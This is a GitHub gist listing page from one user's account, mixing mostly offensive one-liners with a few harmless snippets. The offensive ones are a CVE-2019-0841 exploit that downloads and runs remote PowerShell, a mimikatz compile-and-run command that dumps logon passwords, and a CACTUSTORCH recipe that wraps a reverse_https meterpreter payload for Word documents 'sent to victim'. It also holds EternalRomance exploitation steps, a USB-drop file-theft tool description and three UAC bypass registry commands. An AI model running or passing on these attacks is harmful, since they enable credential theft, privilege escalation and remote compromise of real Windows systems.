illwill xillwillx

xillwillx / admin.ps1
Created Apr 18, 2019
list local admin accounts
# List members of the local Administrators group as DOMAIN\Name
$admins = Gwmi win32_groupuser
$admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}
$admins |% {$_.partcomponent -match '.+Domain\=(.+)\,Name\=(.+)$' > $null; $matches[1].trim('"') + '\' + $matches[2].trim('"') | Select-Object @{Name='Account Name';Expression={$_}}}
xillwillx / CVE-2019-0841.ps1
Last active Jun 17, 2020
CVE-2019-0841 - Overwrite HOST file with "Full Control" permissions given to the user
iex (New-Object net.webclient).downloadstring('');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process
View gist:97a9fa7e10fc0d5bcca8f717bf76e904
ssh root@
nano /boot/config.txt
ctrl+w to find
Type: i2c_arm and add the uncommented lines underneath
## i2c_arm
## Enable the ARM's i2c interface
## Default off.
xillwillx / .bash_profile
Last active Dec 28, 2018
Mac ~/.bash_profile
export PATH="$PATH:/usr/bin/"
alias ll='ls -GFHAf -1' # ll: directory listing in 1 column
alias f='open -a Finder ./' # f: Opens current directory in MacOS Finder
alias cpwd='pwd|tr -d "\n"|pbcopy' # cpwd: copy the working directory path
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias wttr='curl'
alias myip='curl -s' ;echo
xillwillx / katz.cmd
Last active Oct 21, 2020
mimikatz.cs one-liner
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
git clone && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
xillwillx / gist:6db5cd392acafc1ac486f9852f698be6
Last active Sep 19, 2018
EternalRomance Python Example with ReverseTCP Meterpreter
# Test victim IP first to see if exploitable
use auxiliary/scanner/smb/pipe_auditor
#*choose pipe name 'netlogon'
######Exploiting the Victim##########
# Setup Meterpreter Handler
xillwillx / FishSticks.ps1
Created Apr 29, 2017 — forked from SadProcessor/FishSticks.ps1
Generate nefarious powershell wrapped in .wsf for USB-Drop Attacks. Will harvest all files with specified extensions from specified folders and send them to specified Gmail account.
____ _ _ ___ _ _ _
| __(_)__| |_ / __| |_(_)__| |__ ___
| _|| (_-< ' \\__ \ _| / _| / /(_-<
|_| |_/__/_||_|___/\__|_\__|_\_\/__/.v1
"Life is like a box of FishSticks, you never know what you're gonna get..."
Benjamin Buford "Bubba" Blue - 1965.
xillwillx / .cmd
Last active Sep 18, 2021
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

Keybase proof

I hereby claim:

  • I am xillwillx on github.
  • I am illwill ( on keybase.
  • I have a public key whose fingerprint is 6D14 E83A 93C6 3380 4F0F FF70 E170 DBAA AE04 6737

To claim this, I am signing this object: